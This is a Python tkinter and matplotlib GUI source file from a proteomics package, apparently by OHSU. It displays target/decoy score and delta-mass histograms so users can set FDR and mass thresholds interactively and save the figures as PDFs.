to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
Direct questions to:
Technology & Research Collaborations, Oregon Health & Science University,
Ph: 503-494-8200, FAX: 503-494-4729, Email: techmgmt@ohsu.edu.
"""
###############################
###############################
# converting to Python 3 -PW 9/16/2017
from tkinter import *
import tkinter.ttk as ttk
from tkinter import filedialog
from tkinter import messagebox
import os
import numpy as np
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
from PAW_lib import FigureGenerator
from PAW_lib import DataInfoAndFilter
from PAW_lib import Threshold
import PAW_lib
import pickle
class Histogram:
''' A histogram object tracks information needed to plot histogram data, including
the textstring to display, the matplotlib, plot itself, the plot widget, x ranges, the placement of
the vertical bar, the placement of curve fitting information, and a pointer to the original object
storing numpy data (histogram) '''
    def __init__(self, h, notebook):
        """Wrap histogram data *h* and build its text table and plot for *notebook*."""
        self.ntt = h.ntt
        self.z = h.z
        self.histogram = h                  # Pointer to data object
        self.plot = None                    # The figure to plot
        self.xmin = -6                      # position of x axis
        self.xmax = 12
        self.vertLine = None                # green tracking bar
        self.vertLineThresholdSet = None    # location of black dotted line
        self.textString = ''                # The string to plot
        self.headerString = ''              # first header line above the text view
        self.FDRThreshold = 1.0             # Flag for initial FDR threshold 'guess' value
        self.sparseCutoff = 50              # Cutoff for number of Forward - Reverse spectra qualifying as sparse
        self.histogram.sparseData = False   # Does the current histogram contain sparse data? Used in filtering step
        self.ln = self.initLn()             # Placement of the line in the text view
        self.notebook = notebook            # Pointer to parent notebook
        # Gui pointers
        self.can = None                     # Pointer to canvas widget for this plot
        # Builds text string and plot
        self.makeTextString()
        self.makePlot()
        self.checkSparse()                  # Remove lines from sparse figures
def checkSparse(self):
if(self.histogram.sparseData):
self.vertLine.set_visible(False)
self.vertLineThresholdSet.set_visible(False)
    def initLn(self):
        ''' Sets the initial value of the line in the table view to the first case of 1% FDR,
        or determines if the data is sparse and then sets the sparseData flag to True.

        Returns the 1-based line number for the text view (0 for an empty frame).
        '''
        # print('Z, ntt, mod:', self.z, self.ntt, self.histogram.mod)
        x = self.histogram.histo[self.histogram.histo.FDR.astype(float) <= self.FDRThreshold]
        # print('length of x:', len(x))
        # test = x[x['DiscScore'] > 2]
        test = self.histogram.histo[self.histogram.histo['DiscScore'] > 2]
        # print('length of test:', len(test))
        if len(test.index) > 0:
            # Sparse data: too few net (Forward - Reverse) spectra above score 2.
            if(test[test.index == test.index[0]].RRForward.item() - test[test.index == test.index[0]].RRReverse.item() <= self.sparseCutoff):
                self.histogram.sparseData = True
                # NOTE(review): this sets self.zeroData, while the empty-frame
                # branch below sets self.histogram.zeroData — the original
                # author flagged this as uncertain too; confirm which object
                # should carry the flag.
                self.zeroData = True
                print('Warning, sparse data frame...', ' ntt: ', self.ntt, ' z:', self.z, ' mod:', self.histogram.mod)
        if len(x.index) > 0:
            # Normal data, find first FDR <= self.FDRThreshold
            self.histogram.threshold = x.index[0]
            return x.index[0] + 1   # Off by one, I think because of removing header line
        # Frame is empty (no points where FDR is below cutoff)
        else:
            print('Warning, zero data frame...', ' ntt: ', self.ntt, ' z:', self.z, ' mod:', self.histogram.mod)
            self.histogram.zeroData = True
            self.histogram.sparseData = True
            return 0
def setLn(self, val):
'''
Sets the position of the line. This is called by the gui widget's callbacks.
'''
if(self.histogram.sparseData):
self.vertLine.set_visible(True) # Make green line visible
self.ln = val
#self.histogram.threshold = self.ln - 1
def updateVerticalLine(self):
'''
Updates the position of the green vertical line. Has to look for the discscore value
corresponding to the current line in the text file. Ln in the text file corresponds to an
index in the discscore column. This is called by the gui widget's callbacks.
'''
xval = self.histogram.histo['DiscScore'][self.ln]
self.vertLine.set_xdata((xval, xval))
def setThresh(self, event):
'''
This updates the black dotted line and sets the plot's score threshold to the value at the
current location in the table/plot. This is called from one of the gui widget's callbacks.
'''
if(self.histogram.sparseData): # Manually override sparse data cutoff
self.histogram.sparseData = False
self.vertLineThresholdSet.set_visible(True) # Make black dotted line visible
self.histogram.threshold = self.ln - 1
xval = self.histogram.histo['DiscScore'][self.ln]
self.vertLineThresholdSet.set_xdata((xval, xval))
self.can.draw()
def makeTextString(self):
'''
Construct the text string
'''
# I use a cStringIO buffer in order to speed up the construction of the string. This buffer is passsed
# into panda's toString method, which takes a 'buf' param
from io import StringIO
output = StringIO()
# Make the text string, but don't display the index values.
self.textString = self.histogram.histo.to_string(buf = output, index=False, col_space=12)
self.textString = output.getvalue()
output.close() # Close the buffer
splitString = self.textString.split('\n')
self.textString = '\n'.join(splitString[1:])
self.headerString = splitString[0] # Make a seperate header line for the titles
    def makePlot(self):
        '''
        Construct the matplotlib Figure for this score histogram: filled
        target (blue) and decoy (red) curves, a movable green selection line,
        and a black dotted threshold line placed at the current line position.
        '''
        self.plot = Figure(figsize=(5,3), dpi=100)
        target = self.plot.add_subplot(111)
        decoy = self.plot.add_subplot(111)
        # center is used for the x axis, and is calculated as the midpoints of
        # the bins computed with linspace (301 edges -> 300 bin centers).
        mybins = np.linspace(-8, 12, 301)
        center = (mybins[:-1] + mybins[1:]) / 2
        # Choose smoothed or raw counts based on the notebook's plot-type setting.
        if(self.notebook.plotType.get() == 'Smoothed Plot'):
            target.fill(center, self.histogram.Smforward, color='b')
            decoy.fill(center, self.histogram.Smreverse, color='r')
        else:
            target.fill(center, self.histogram.forward, color='b')
            decoy.fill(center, self.histogram.reverse, color='r')
        # Adds the green vertical line. plot() returns a list of Line2D objects
        # that can be used to update the position later with set_xdata.
        greenVerticalLine = self.plot.add_subplot(111)
        l = greenVerticalLine.plot((0.0, 0.0), (target.axis()[2], target.axis()[3]), '-g', linewidth = 2.0)
        self.vertLine = l[0]
        # The black dotted line. Set its placement to the current threshold
        # position (the 1% FDR position per the original comment).
        vertLineThresholdSet = self.plot.add_subplot(111)
        xval = self.histogram.histo['DiscScore'][self.ln]
        l = vertLineThresholdSet.plot((xval, xval), (target.axis()[2], target.axis()[3]), '--k', linewidth = 2.0)
        self.vertLineThresholdSet = l[0]
        # If there are xmin or xmax values supplied, set them.
        # NOTE(review): a limit of exactly 0 is falsy and would be skipped here.
        if self.xmin and self.xmax:
            target.set_xlim(self.xmin, self.xmax)
            decoy.set_xlim(self.xmin, self.xmax)
        # set up labels
        target.set_title('Z=%s, NTT=%s, %s' % (str(self.z), str(self.ntt), self.histogram.mod))
        target.set_xlabel("Disc Score")
        target.set_ylabel("Counts")
        # makes sure the bottom axis is fully visible
        self.plot.tight_layout()
    def makePlotWidget(self, frcanvas):
        ''' Generate a tkinter canvas widget from the matplotlib plot.

        Called from setup() in the BRNotebook class; frcanvas is the gui
        frame into which the widget should be inserted. It must already have
        been constructed by the BRNotebook instance.
        '''
        canvas = BRCanvas(self.plot, master=frcanvas, gui=self.notebook.gui)
        canvas.draw()
        canvas.get_tk_widget().pack(side=LEFT, fill=BOTH, expand=YES)
        # These two callbacks are bound here (not in BRCanvas) because they
        # are handled differently for deltamass plots.
        canvas.get_tk_widget().bind('<Button-1>', canvas.focusCanvas)
        canvas.get_tk_widget().bind('<Return>', self.setThresh)
        # Other, non-varying callbacks are set in the BRCanvas class.
        frcanvas.pack(side=TOP, expand=YES, fill=BOTH)
        canvas.histogram = self # Retain reference so the canvas can reach this wrapper.
        self.can = canvas # Keep the canvas widget in an instance variable.
class DeltaMassHistogram(Histogram):
    ''' A DeltaMassHistogram tracks everything needed to display delta-mass
    histogram data: the text string shown in the table view, the matplotlib
    Figure itself, the plot widget, the x-axis range, the placement of the
    vertical selection bar, and a pointer back to the original object that
    stores the numpy data (self.histogram).

    It is a subclass of Histogram, so any methods not present here fall back
    to Histogram's implementations. Most methods required custom
    implementations; subclassing allows for method overriding, which makes
    for uniform calls from outside the class (e.g. positioning the vertical
    selection bar) even though the implementation differs between score and
    mass histograms.'''
    def __init__(self, h, notebook, FULL_RANGE = False):
        '''
        h: underlying delta-mass histogram data object (has .z, .dm, .histo).
        notebook: the BRNotebook instance this plot resides in.
        FULL_RANGE: True when this is the full-mass-range plot variant.
        '''
        self.histogram = h # Original histogram data
        self.notebook = notebook # The notebook the plot resides in
        self.ln = self.initLn() # The current line in the text file
        self.z = h.z
        self.dm = h.dm
        self.plot = None # The figure to plot
        self.target = None
        self.decoy = None # Tracking target and decoy plots to get data for zoom
        self.xmin = None # For plotting x axis
        self.xmax = None # For plotting x axis
        self.vertLine = None # The moving green vertical line
        self.textString = '' # The string to plot
        self.headerString = '' # The first title line above the large string
        self.FULL_RANGE = FULL_RANGE # Full range plot
        self.zoomFactor = 2 # Factor by which to zoom plots
        # 0 = low or left DM, 1 = high or right DM
        self.currentDM = 0 # Tracks the current threshold being modified (left or right)
        self.histogram.sparseData = False # for histogram/dmhistogram issues, remove later
        self.makeTextString()
        self.makePlot()
    def makeTextString(self):
        '''
        Builds the text string to display as data. A StringIO buffer is used
        for speed; pandas' to_string writes into 'buf' (and returns None), so
        the rendered text is read back from the buffer.
        '''
        from io import StringIO
        output = StringIO()
        self.textString = self.histogram.histo.to_string(buf=output, index=False, col_space=12)
        self.textString = output.getvalue()
        output.close()
        # Separate the column-title line from the data body.
        splitString = self.textString.split('\n')
        self.textString = '\n'.join(splitString[1:])
        self.headerString = splitString[0]
    def makePlot(self):
        '''
        Builds the dm plots. The data arrays and bin layout depend on which
        delta-mass window this instance represents (0 Da, 1 Da, 'ALL', or
        2 = the "outside" full-range window).
        '''
        self.plot = Figure(figsize=(5,3), dpi=100)
        target = self.plot.add_subplot(111)
        decoy = self.plot.add_subplot(111)
        if self.dm == 0:
            # 0 Da window: +/- 0.05 Da, 201 bin edges.
            target.set_xlim(-0.05, 0.05)
            decoy.set_xlim(-0.05, 0.05)
            self.xmin = -0.05
            self.xmax = 0.05
            Forward = self.histogram.forwardDeltaMassZero
            Reverse = self.histogram.reverseDeltaMassZero
            smForward = self.histogram.smForwardDeltaMassZero
            smReverse = self.histogram.smReverseDeltaMassZero
            mybins = np.linspace(-0.05, 0.05, 201)
        elif self.dm == 1:
            # 1 Da window: 0.9 to 1.1 Da, 401 bin edges.
            target.set_xlim(0.9, 1.1)
            decoy.set_xlim(0.9, 1.1)
            self.xmin = 0.9
            self.xmax = 1.1
            Forward = self.histogram.forwardDeltaMassOne
            Reverse = self.histogram.reverseDeltaMassOne
            smForward = self.histogram.smForwardDeltaMassOne
            smReverse = self.histogram.smReverseDeltaMassOne
            mybins = np.linspace(0.90, 1.10, 401)
        elif self.dm == 'ALL':
            # Full range (low-resolution data).
            self.xmin = -self.histogram.dmRange
            self.xmax = self.histogram.dmRange
            Forward = self.histogram.forwardDeltaMass
            Reverse = self.histogram.reverseDeltaMass
            smForward = self.histogram.smForwardDeltaMass
            smReverse = self.histogram.smReverseDeltaMass
            mybins = self.histogram.mybins
        elif self.dm == 2:
            # "Outside" window: same full-range data as 'ALL'.
            self.xmin = -self.histogram.dmRange
            self.xmax = self.histogram.dmRange
            Forward = self.histogram.forwardDeltaMass
            Reverse = self.histogram.reverseDeltaMass
            smForward = self.histogram.smForwardDeltaMass
            smReverse = self.histogram.smReverseDeltaMass
            mybins = self.histogram.mybins
        # NOTE(review): if self.dm matches none of the branches above, the
        # names Forward/mybins/etc. are unbound and the next line raises.
        center = (mybins[:-1] + mybins[1:]) / 2
        #print('dm:', self.dm)
        #print('len y:', len(smForward))
        #print('len bins:', len(mybins))
        #print('len x:', len(center))
        if(self.notebook.plotType.get() == 'Smoothed Plot'):
            #target.fill(center, smForward, color='b')
            #decoy.fill(center, smReverse, color='r')
            target.plot(center, smForward, color='b')
            decoy.plot(center, smReverse, color='r')
        else:
            #target.fill(center, Forward, color='b')
            #decoy.fill(center, Reverse, color='r')
            target.plot(center, Forward, color='b')
            decoy.plot(center, Reverse, color='r')
        # Sets up the vertical line to display. Initializes it at the low threshold position.
        # target.axis()[2] and [3] are the current y-axis limits, which the line should span.
        greenLine = self.plot.add_subplot(111)
        l = greenLine.plot((self.histogram.thresholdLow, self.histogram.thresholdLow), (target.axis()[2], target.axis()[3]), '-g', linewidth = 2.0)
        self.vertLine = l[0]
        # Sets up the low and high threshold black dotted lines.
        # Skipped if no low/high thresholds are present, like the "out" region
        # that's not displayed. NOTE(review): a threshold of exactly 0 is
        # falsy and would also skip this block.
        if(self.histogram.thresholdLow and self.histogram.thresholdHigh):
            low = self.plot.add_subplot(111)
            l= low.plot((self.histogram.thresholdLow, self.histogram.thresholdLow), (target.axis()[2], target.axis()[3]), '--k', linewidth = 2.0)
            high = self.plot.add_subplot(111)
            h = high.plot((self.histogram.thresholdHigh, self.histogram.thresholdHigh), (target.axis()[2], target.axis()[3]), '--k', linewidth = 2.0)
            self.low = l[0]
            self.high = h[0]
        # Set title and axis labels
        if(self.dm == 0 or self.dm == 1 or self.dm == 2):
            if self.dm != 2:
                target.set_title(str(self.dm) + ' Da Delta Mass')
            else:
                target.set_title('Full Range Delta Mass')
        else:
            target.set_title('Full range Delta Mass')
        target.set_xlabel("Deltamass (Da)")
        target.set_ylabel("Counts")
        target.set_xlim((self.xmin, self.xmax))
        self.plot.tight_layout()
        # track these for zooming
        self.target = target
        self.decoy = decoy
    def makePlotWidget(self, frcanvas):
        '''
        Build the actual tkinter widget and assign callbacks.
        frcanvas: the gui frame into which the widget is packed.
        '''
        canvas = BRCanvas(self.plot, master=frcanvas, gui=self.notebook.gui)
        canvas.draw()
        canvas.get_tk_widget().pack(side=LEFT, fill=BOTH, expand=YES)
        canvas.get_tk_widget().bind('<Button-1>', canvas.focusCanvas)
        canvas.histogram = self # Retain reference to self
        self.can = canvas
        # Delta-mass-specific key bindings: zoom, threshold set, left/right
        # threshold selection.
        canvas.get_tk_widget().bind('<Double-Button-1>', self.zoom)
        canvas.get_tk_widget().bind('<Double-Button-3>', self.unZoom)
        canvas.get_tk_widget().bind('<Return>', self.setThresh)
        canvas.get_tk_widget().bind('<Left>', self.goToLeft)
        canvas.get_tk_widget().bind('<Right>', self.goToRight)
    def setThresh(self, event):
        '''
        Sets the threshold when the enter key is pressed, depending on
        whether the left (low) or right (high) threshold is selected.
        '''
        if self.currentDM == 0:
            self.setLeftDM()
        else:
            self.setRightDM()
    def setLeftDM(self):
        '''
        Helper method for setThresh. Sets the threshold attribute for the
        left (low) threshold and moves its dotted line.
        '''
        self.histogram.thresholdLow = self.histogram.histo['deltaMass'][self.ln-1]
        self.low.set_xdata((self.histogram.thresholdLow, self.histogram.thresholdLow))
        self.can.draw()
    def setRightDM(self):
        '''
        Helper method for setThresh. Sets the threshold attribute for the
        right (high) threshold and moves its dotted line.
        '''
        self.histogram.thresholdHigh = self.histogram.histo['deltaMass'][self.ln-1]
        self.high.set_xdata((self.histogram.thresholdHigh, self.histogram.thresholdHigh))
        self.can.draw()
    def goToLeft(self, event):
        '''
        Sets the left threshold as active when the left arrow key is pressed,
        and jumps the green display line to that threshold.
        '''
        self.currentDM = 0
        self.vertLine.set_xdata((self.histogram.thresholdLow, self.histogram.thresholdLow))
        self.can.draw()
        # Find the table row whose deltaMass matches the threshold (within
        # 0.0005 Da, since the computed value differs in float precision).
        xval = self.histogram.histo[abs(self.histogram.histo['deltaMass'] - self.histogram.thresholdLow) < .0005]
        self.ln = xval.index[0]
    def goToRight(self, event):
        '''
        Sets the right threshold as active when the right arrow key is
        pressed, and jumps the green display line to that threshold.
        '''
        self.currentDM = 1
        self.vertLine.set_xdata((self.histogram.thresholdHigh, self.histogram.thresholdHigh))
        self.can.draw()
        # Same float-tolerant row lookup as goToLeft, for the high threshold.
        xval = self.histogram.histo[abs(self.histogram.histo['deltaMass'] - self.histogram.thresholdHigh) < .0005]
        self.ln = xval.index[0]
    def zoom(self, event):
        '''Shrink the y-axis range by 1/zoomFactor to zoom in (double left-click).'''
        ymin, ymax = self.target.get_ylim()
        self.target.set_ylim(0, ymax - ymax/(self.zoomFactor))
        self.can.draw()
    def unZoom(self, event):
        '''Grow the y-axis range by zoomFactor to zoom out (double right-click).'''
        ymin, ymax = self.target.get_ylim()
        self.target.set_ylim(0, ymax + ymax*(self.zoomFactor))
        self.can.draw()
    def updateVerticalLine(self):
        '''Move the green line to the deltaMass value of the current line.'''
        #print('vertical line method')
        #print('len frame:', len(self.histogram.histo))
        #print('line:', self.ln)
        if self.ln > 1:
            xval = self.histogram.histo['deltaMass'][self.ln-1]
        else:
            # Clamp to the first data row for line numbers <= 1.
            xval = self.histogram.histo['deltaMass'][1]
        #print('xval:', xval)
        self.vertLine.set_xdata((xval, xval))
    def setLn(self, val):
        '''
        Setter for current line position in table.
        '''
        self.ln = val
    def initLn(self):
        '''Return the initial table line: the row at the low threshold, or 1.'''
        # NOTE(review): a threshold of exactly 0 is falsy and falls through
        # to the default of 1.
        if(self.histogram.thresholdLow and self.histogram.thresholdHigh):
            # Setting the deltamass location in the table to the low threshold
            # calculated will fail because the calculated number is at a
            # different level of float accuracy, so make sure they're within
            # less than five ten-thousandths of each other.
            xval = self.histogram.histo[abs(self.histogram.histo['deltaMass'] - self.histogram.thresholdLow) < .0005]
            if xval.empty: # If there's no location for low threshold, just set to 1.
                return 1   # Probably will happen for all low mass data.
            else:
                return xval.index[0]
        else:
            return 1
class BRNotebook(ttk.Notebook):
    ''' BRNotebook manages a ttk notebook object: one tab per charge state,
    each holding plot canvases (score or delta-mass histograms) above a
    scrollable text table of the underlying data. '''
    def __init__(self, gui=None, container = [], plotType = '', **args):
        '''
        gui: main GUI object.
        container: FigureGenerator-like object holding histogram data.
            NOTE(review): the [] default would fail at .container below;
            a real container object is required in practice.
        plotType: tk StringVar selecting smoothed vs standard plots.
        '''
        ttk.Notebook.__init__(self, **args)
        self.histograms = {} # Dictionary of score histograms, keyed by z index
        self.deltaMassHistograms = {} # Dictionary of deltamass histograms, keyed by z index
        self.fr = None # main frame
        self.gui = gui # reference to main GUI object
        self.container = container.container # container of histogram data to process
        self.containerDeltaMass = container.dmContainer # container of deltamass histograms
        self.containerStats = container.globalStats
        self.rawContainer = container # pointer back to the main container - it has list and flag information
        #self.txtStats = container.txtStats
        self.plotType = plotType # Smoothed or not
        self.setup_deltaMass() # First setup deltamass plots by default.
        #self.setup() # initialization function to set up view...
        #self.setup_stats()
    def saveDMFigures(self):
        '''
        Save delta-mass pdf figures under filtered_files/ThresholdFigures,
        creating the folders if necessary.
        '''
        sqt_container = os.path.dirname(os.getcwd()) # assumes we have set location to the folder with SQT files
        filter_container = os.path.join(sqt_container, 'filtered_files') # put the threshold figures in the filtered_files folder
        self.fig_container = os.path.join(filter_container, 'ThresholdFigures') # put the threshold figures in the filtered_files folder
        if not os.path.exists(filter_container):
            os.mkdir(filter_container)
        if not os.path.exists(self.fig_container):
            os.mkdir(self.fig_container)
        for figs in self.deltaMassHistograms.values():
            for fig in figs: # using relative folder paths
                fig_file_name = os.path.join(self.fig_container, 'Mass_Figure_dm=' + str(fig.dm) + '_z=' + str(fig.z) + '.pdf')
                fig.plot.savefig(fig_file_name)
    def saveScoreFigures(self):
        '''
        Save score pdf figures. Assumes saveDMFigures has already run and set
        self.fig_container.
        '''
        for figs in self.histograms.values():
            for fig in figs:
                fig_file_name = os.path.join(self.fig_container, 'Score_Figure_dm=' + str(fig.histogram.dm) + '_z=' + str(fig.z) +
                                             '_ntt=' + str(fig.ntt) + '_mod=' + str(fig.histogram.mod) + '.pdf')
                fig.plot.savefig(fig_file_name)
    def setup(self):
        '''
        Setup the score view: one tab per (delta-mass window, charge), each
        containing a per-mod notebook of plots above a text table.
        '''
        # remove deltamass tabs from window
        for tab in self.tabs():
            self.forget(tab)
        # Create names for dm windows to reference when building tabs
        if self.rawContainer.accurateMass:
            daWindow = {0: '0 Da', 1: '1 Da', 2: 'out'}
        else:
            daWindow = {0: 'All'}
        # Loop through score data and set up the canvases
        for dm, dmFig in enumerate(self.container):
            for f, fig in enumerate(dmFig):
                theZ = self.rawContainer.zList[f] # get z value for place in list
                # set up canvases
                self.fr = Frame(self.gui.root) # self.fr is a large canvas for the whole tab
                frcanvas = Frame(self.fr) # frcanvas is a frame for the entire mod notebook on top of the textview
                nb = ttk.Notebook(frcanvas) # notebook to hold each mod
                frames = {}
                for mod in self.rawContainer.modList:
                    frames[mod] = Frame() # Make a frame for each mod
                # NOTE(review): the nested loops below deliberately reuse the
                # name 'fig' at each level (ntt, then mod) -- fragile but works.
                for fig in fig: # Loops over ntt
                    for fig in fig: # loops over mod
                        h = Histogram(fig, self)
                        h.makePlotWidget(frames[fig.mod]) # add plot to frame for specific mod
                        if f not in self.histograms:
                            self.histograms[f] = [h]
                        else:
                            self.histograms[f].append(h)
                for frcan in frames:
                    string = frcan
                    if frcan == ' ':
                        string = 'Unmod' # this if may no longer be needed - unmod is set in loading_TXT_files...
                    nb.add(frames[frcan], text = string) # add each mod frame to notebook as separate tab
                nb.pack(side=TOP, expand=YES, fill=BOTH)
                frcanvas.pack(side=TOP, expand=YES, fill=BOTH)
                self.add(self.fr, text = (theZ, '+', '_', str(daWindow[dm]))) # Add the whole frame with textview and canvases to main notebook
                histPointer = h # last histogram built; supplies header/body text below
                # Now set up the text view
                # Get just header line
                headerString = histPointer.headerString
                # set up header text view
                frtext = Frame(self.fr) # Text view frame inside the tab frame, below the canvases notebook
                text = Text(frtext, relief=SUNKEN)
                text.insert('1.0', headerString)
                text.pack(side=TOP, expand=NO, fill=X)
                text.config(width=1, height=1)
                text['wrap'] = 'none'
                text['state'] = 'disabled'
                # Set up main text view
                textString = histPointer.textString
                text = BRText(frtext, relief=SUNKEN, notebook=self, gui=self.gui)
                text.insert('1.0', textString)
                text.focus()
                text.bind('<Button-1>', text.select)
                text.bind('<Up>', text.upKey)
                text.bind('<Down>', text.downKey)
                text.bind('<Return>', text.setThresh)
                text.pack(side=LEFT, expand=YES, fill=BOTH)
                text['state'] = 'disabled' # prevents text editing
                text['wrap'] = 'none'
                sbar = Scrollbar(frtext)
                sbar.config(command=text.yview)
                text.config(yscrollcommand=sbar.set)
                sbar.pack(side=RIGHT, fill=Y)
                hbar = Scrollbar(frtext, orient='horizontal')
                hbar.config(command=text.xview)
                text.config(xscrollcommand=hbar.set)
                hbar.pack(side=BOTTOM, fill=X)
                frtext.pack(side=BOTTOM, expand=YES, fill=BOTH)
                # Cross-link the text view with the canvases of this dm window.
                for histo in self.histograms[f]:
                    if histo.histogram.dm == daWindow[dm]:
                        histo.can.text = text # Add pointer to current text view in canvas
                        text.canvas = histo.can # Keep pointer to canvas in text view
                        text.see("%d.0" % text.canvas.histogram.ln) # Go to current set line
                        text.refreshView()
    def setup_deltaMass(self):
        '''
        Build one tab per charge state holding the delta-mass plots (full
        range on top, windows below) and the associated text table.
        '''
        import pprint
        for f in range(len(self.containerDeltaMass[0])):
            self.fr = Frame(self.gui.root)
            plotsContainer = Frame(self.fr)
            plotsContainer.pack(side=TOP, expand=YES, fill=BOTH)
            frcanvas = Frame(plotsContainer)
            bottom_fr = Frame(plotsContainer)
            frcanvas.pack(side=TOP, expand=YES, fill=X)
            bottom_fr.pack(side=BOTTOM, expand=YES, fill=X)
            for x, fig in enumerate(self.containerDeltaMass):
                # set up canvases
                # Since there's nothing in the container for full mass range, at the end of the list,
                # make an extra plot for full mass range ONLY if data has accurate mass. The low mass
                # container will only have 1 plot, the full range plot, so no need in that case.
                if self.gui.ACCURATE_MASS and x == (len(self.containerDeltaMass) - 1):
                    h = DeltaMassHistogram(fig[f], self, FULL_RANGE=True)
                    h.makePlotWidget(frcanvas)
                else:
                    h = DeltaMassHistogram(fig[f], self)
                    h.makePlotWidget(bottom_fr)
                if f not in self.deltaMassHistograms:
                    self.deltaMassHistograms[f] = [h]
                else:
                    self.deltaMassHistograms[f].append(h)
            # Get just header line (from the last histogram added for this z)
            headerString = self.deltaMassHistograms[f][len(self.deltaMassHistograms[f])-1].headerString
            # set up related text view
            frtext = Frame(self.fr)
            text = Text(frtext, relief=SUNKEN)
            text.insert('1.0', headerString)
            text.pack(side=TOP, expand=NO, fill=X)
            text.config(width=1, height=1)
            text['wrap'] = 'none'
            text['state'] = 'disabled'
            textString = self.deltaMassHistograms[f][len(self.deltaMassHistograms[f])-1].textString
            text = BRText(frtext, relief=SUNKEN, notebook=self, gui=self.gui)
            text.insert('1.0', textString)
            #text.tag_add(SEL, '1.0', '1.200')
            text.focus()
            text.bind('<Button-1>', text.select)
            text.bind('<Up>', text.upKey)
            text.bind('<Down>', text.downKey)
            text.bind('<Return>', text.setThresh)
            text.bind('<Left>', text.goToLeft)
            text.bind('<Right>', text.goToRight)
            text.pack(side=LEFT, expand=YES, fill=BOTH)
            text['wrap'] = 'none'
            text['state'] = 'disabled' # prevents text editing
            sbar = Scrollbar(frtext)
            sbar.config(command=text.yview)
            text.config(yscrollcommand=sbar.set)
            sbar.pack(side=RIGHT, fill=Y)
            hbar = Scrollbar(frtext, orient='horizontal')
            hbar.config(command=text.xview)
            text.config(xscrollcommand=hbar.set)
            hbar.pack(side=BOTTOM, fill=X)
            frtext.pack(side=BOTTOM, expand=YES, fill=BOTH)
            # Cross-link the text view with every canvas for this charge.
            for histo in self.deltaMassHistograms[f]:
                histo.can.text = text
                text.canvas = histo.can
                #if not text.canvas.histogram.ln:
                #    continue
                text.see("%d.0" % text.canvas.histogram.ln)
                text.refreshView()
            theZ = self.rawContainer.zList[f]
            self.add(self.fr, text = (theZ, '+_DM'))
            f += 1  # NOTE(review): no effect -- f is rebound by the for loop
    def setup_stats(self):
        '''Build a "Stats" tab with a grid of target/decoy counts per charge.'''
        self.fr = Frame(self.gui.root)
        statsContainer = Frame(self.fr)
        # Header row: alternating target/decoy columns per charge state.
        Label(statsContainer, text = '1+ Target\t').grid(column = 1, row = 0)
        Label(statsContainer, text = '1+ Decoy\t').grid(column = 2, row = 0)
        Label(statsContainer, text = '2+\t').grid(column = 3, row = 0)
        Label(statsContainer, text ='2+\t').grid(column = 4, row = 0)
        Label(statsContainer, text ='3+\t').grid(column = 5, row = 0)
        Label(statsContainer, text ='3+\t').grid(column = 6, row = 0)
        Label(statsContainer, text ='4+\t').grid(column = 7, row = 0)
        Label(statsContainer, text ='4+\t').grid(column = 8, row = 0)
        Label(statsContainer, text ='Unmod').grid(column = 0, row = 1)
        Label(statsContainer, text ='Full').grid(column = 0, row = 2)
        DM = len(self.containerDeltaMass) - 1
        NTT = len(self.container[0][0])
        if(NTT == 3):
            # Full/Semi/Non tryptic rows, one column pair per charge state.
            for z in range(len(self.containerDeltaMass[0])):
                Label(statsContainer, text = str(self.containerStats.target_subclass[DM][z][0][0])).grid(column = z+1, row = 2)
                Label(statsContainer, text = str(self.containerStats.decoy_subclass[DM][z][0][0])).grid(column = z+2, row = 2)
            Label(statsContainer, text ='Semi').grid(column = 0, row = 3)
            for z in range(len(self.containerDeltaMass[0])):
                Label(statsContainer, text = str(self.containerStats.target_subclass[DM][z][1][0])).grid(column = z+1, row = 3)
                Label(statsContainer, text = str(self.containerStats.decoy_subclass[DM][z][1][0])).grid(column = z+2, row = 3)
            Label(statsContainer, text ='Non').grid(column = 0, row = 4)
            for z in range(len(self.containerDeltaMass[0])):
                Label(statsContainer, text = str(self.containerStats.target_subclass[DM][z][2][0])).grid(column = z+1, row = 4)
                Label(statsContainer, text = str(self.containerStats.decoy_subclass[DM][z][2][0])).grid(column = z+2, row = 4)
        if(NTT < 3):
            # Fewer NTT classes: the 'Non' row has no data, fill with dashes.
            for z in range(len(self.containerDeltaMass[0])):
                Label(statsContainer, text = str(self.containerStats.target_subclass[DM][z][0][0])).grid(column = z+1, row = 2)
                Label(statsContainer, text = str(self.containerStats.decoy_subclass[DM][z][0][0])).grid(column = z+2, row = 2)
            Label(statsContainer, text ='Semi').grid(column = 0, row = 3)
            for z in range(len(self.containerDeltaMass[0])):
                Label(statsContainer, text = str(self.containerStats.target_subclass[DM][z][1][0])).grid(column = z+1, row = 3)
                Label(statsContainer, text = str(self.containerStats.decoy_subclass[DM][z][1][0])).grid(column = z+2, row = 3)
            Label(statsContainer, text ='Non').grid(column = 0, row = 4)
            for z in range(len(self.containerDeltaMass[0])):
                Label(statsContainer, text = "----------").grid(column = z+1, row = 4)
                Label(statsContainer, text = "----------").grid(column = z+2, row = 4)
        Label(statsContainer, text ='Totals').grid(column = 0, row = 5)
        Label(statsContainer, text = self.containerStats.target_filtered).grid(column = 1, row = 5)
        Label(statsContainer, text = self.containerStats.decoy_filtered).grid(column = 3, row = 5)
        statsContainer.pack()
        self.add(self.fr, text = 'Stats')
class BRCanvas(FigureCanvasTkAgg):
    ''' Wraps a FigureCanvasTkAgg and links it to an associated text view. '''
    def __init__(self, parent=None, gui=None, **args):
        FigureCanvasTkAgg.__init__(self, parent, **args)
        self.text = None       # associated text view
        self.ntt = 0           # ntt for this canvas
        self.charge = 0        # charge for this canvas
        self.gui = gui         # reference to main gui object
        self.histogram = None  # histogram wrapper displayed on this canvas
    def focusCanvas(self, event):
        ''' Give focus to this canvas and refresh its text view. '''
        txt = self.text
        txt.canvas = self
        txt['state'] = 'normal'   # make writable while we replace the contents
        txt.focus()
